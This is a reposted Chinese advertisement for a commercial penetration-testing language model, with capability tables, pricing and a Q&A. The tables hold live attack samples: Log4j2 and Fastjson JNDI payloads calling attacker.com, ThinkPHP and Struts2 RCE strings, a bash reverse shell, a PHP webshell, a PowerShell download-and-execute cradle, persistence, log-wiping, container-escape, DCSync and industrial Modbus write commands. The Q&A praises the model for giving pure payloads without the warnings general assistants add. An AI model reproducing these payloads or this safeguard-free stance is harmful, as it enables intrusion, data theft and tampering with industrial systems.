文章总结： AnySec公司发布基于67个种子训练的渗透测试AI模型，覆盖注入、权限、文件操作、CVE利用等8大维度，可输出直接执行的命令和Payload。模型提供GGUF/GPTQ/ONNX/TensorRT四种格式，支持私有化部署和定制微调，定价从1.98万元模型文件到15万元全套方案不等。适用于安全团队和渗透工程师，强调不服务黑灰产且提供1年免费更新。 综合评分： 78 文章分类： 渗透测试,AI安全,安全工具,红队,漏洞分析

维度四：组件·中间件·CVE

| 子类 | 功能 | 输出示例 | | — | — | — | | Log4j2 | JNDI注入RCE + WAF绕过 | ${jndi:ldap://attacker.com:1389/Exploit} | | Fastjson | 反序列化RCE | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit"} | | ThinkPHP | 5.0/5.1/6.x RCE | /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id | | Spring Boot | Actuator泄露 + Gateway RCE | /actuator/env + /gateway/routes SpEL注入 | | Struts2 | S2-045/S2-057/S2-061 | Content-Type: %{(#cmd='id').(#p=new java.lang.ProcessBuilder(#cmds)).start()} | | 中间件 | Tomcat/Weblogic/JBoss | 弱口令 + 部署war包 | | 数据库 | MSSQL/PostgreSQL/Redis/MongoDB | xp_cmdshell / COPY PROGRAM / config set dir |

维度五：命令执行·后门·反弹·提权

| 子类 | 功能 | 输出示例 | | — | — | — | | 反弹Shell | Bash/Python/NC/PowerShell | bash -i >& /dev/tcp/10.10.10.5/4444 0>&1 | | 一句话后门 | PHP/JSP/ASP/ASPX | <?php @eval($_POST['cmd']); ?> | | Windows提权 | PrintSpoofer/JuicyPotato | PrintSpoofer64.exe -i -c cmd.exe | | Linux提权 | CVE-2021-4034/SUID | python3 cve-2021-4034.py | | 权限维持 | 计划任务/注册表/SSH公钥/WMI | schtasks /create /tn "Task" /tr "cmd.exe" /sc daily | | 痕迹清理 | 清日志/删工具/改时间戳 | wevtutil cl Security / history -c |

维度六：绕过·免杀·自动化

| 子类 | 功能 | 输出示例 | | — | — | — | | WAF绕过 | 编码/分块/注释/参数污染 | '%2527%2520union%2520select%25201,2,3--%2520- | | 流量加密 | Base64/Hex/URL多层编码 | 分块传输 + 双层编码组合 | | 主机免杀 | PowerShell内存加载/白利用 | IEX(New-Object Net.WebClient).DownloadString('http://IP/rev.ps1') | | EDR绕过 | 时间加速检测/进程伪装 | 延时执行 + PPID欺骗 | | 批量自动化 | 端口扫描/弱口令爆破/POC | nmap -sV --script vuln 192.168.1.0/24 | | 隧道代理 | DNS隧道/HTTP隧道/FRP/Chisel | frp / chisel client IP:8080 R:1080:socks |

维度七：全场景适配

| 子类 | 功能 | 输出示例 | | — | — | — | | 云原生 | 容器/K8s逃逸 + 云AK/SK | docker run -it -v /:/host ubuntu chroot /host /bin/bash | | 域渗透 | 黄金票据/白银票据/DCSync | mimikatz "lsadump::dcsync /user:krbtgt" | | 工控系统 | Modbus/S7/BACnet | python3 -c "from pymodbus.client import ModbusTcpClient; client.write_coil(0, True)" | | 物联网 | 海康/大华摄像头 | curl /System/configurationFile?auth=YWRtaW46MTEK | | macOS | 内核提权/LaunchAgent持久化 | csrutil disable + launchctl load |

维度八：自动化工具决策（半自动渗透）

| 子类 | 功能 | 输出示例 | | — | — | — | | 工具调用 | sqlmap/nmap/msf/hydra | sqlmap -u "http://target.com/index.php?id=1" --batch --dbs | | 自动绕过 | 检测WAF→自动添加tamper | --tamper=space2comment,randomcase | | 注入切换 | 联合失败→布尔→时间自动切换 | --technique=BTE | | 结果分析 | 扫描结果判定+下一步决策 | 发现445开放→推荐MS17-010检测 | | 批量测试 | 存活发现→端口扫描→POC→自动利用 | nuclei -l urls.txt -t cves/ |

三、服务定价

| 套餐 | 内容 | 价格 | 适合 | | — | — | — | — | | 模型文件（GGUF/GPTQ） | 训练好的Qwen2.5-7B渗透模型 | 19,800元 | 想直接用的团队 | | 定制微调 | 用客户数据训练专属模型 | 5-10万元/单 | 安全公司/甲方 | | 私有化部署+培训 | 部署+培训+1年维护 | 8-15万元 | 需要完整方案 | | API调用服务 | 按月/按次调用 | 99-499元/月 | 个人/小团队 |

四、模型格式选择指南

| 格式 | 运行环境 | 优点 | 推荐 | | — | — | — | — | | GGUF | CPU/GPU通用，8G内存可跑 | 门槛最低，Ollama直接支持 | 个人/小团队（首选） | | GPTQ | GPU（6G显存+） | 速度快、显存省 | 有显卡的企业 | | ONNX | Windows/Linux | 跨平台、.NET集成好 | Windows环境客户 | | TensorRT | NVIDIA GPU | 最快推理速度 | 生产环境高并发 |

默认交付GGUF+GPTQ双格式。需要其他格式额外收费。

🎯 格式选择指南（一句话版）

| 你的情况 | 选这个格式 | | — | — | | 我不懂技术，就想装好就能用 | GGUF + Ollama | | 我有显卡，追求速度 | GPTQ | | 我买了还想自己继续训练 | 原始PyTorch （需额外授权） | | 我是Windows .NET开发 | ONNX | | 我要部署到云服务高并发 | TensorRT |

五、售后说明

| 项目 | 说明 | | — | — | | 交付内容 | 模型文件（GGUF+GPTQ）+ 部署文档 + 1个月技术支持 | | 售后支持 | 1个月免费，后续3000元/年 | | 定制需求 | 额外功能开发按工时计费 | | 原始PyTorch | 不对外提供 |

六、联系方式

微信：[hkdw1991]

公众号：黑帽渗透技术

前10名咨询送3个满分种子模板试看（仅限企业内部使用）

Q&A

Q：模型能直接用于渗透测试吗？

A：模型输出可直接执行的命令，但不具备自动化执行能力。需要配合脚本或手动执行。

Q：模型和GPT/Claude有什么区别？

A：通用模型输出长篇文章、警告、避责声明。我的模型输出纯命令、纯payload，没有废话。

Q：能试用吗？

A：可提供3条种子模板试看，了解数据质量。

Q：模型会持续更新吗？

A：会。购买模型文件的客户，享受1年内免费更新。

Q：原始PyTorch为什么不卖？

A：原始模型可被他人继续微调后二次分发。只提供推理格式GGUF/GPTQ，保障你的权益。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：黑帽渗透技术 AnySec AnySec《花6个月训练了一个专业渗透AI模型，今天开放企业服务（附8大维度功能清单+格式选择指南）》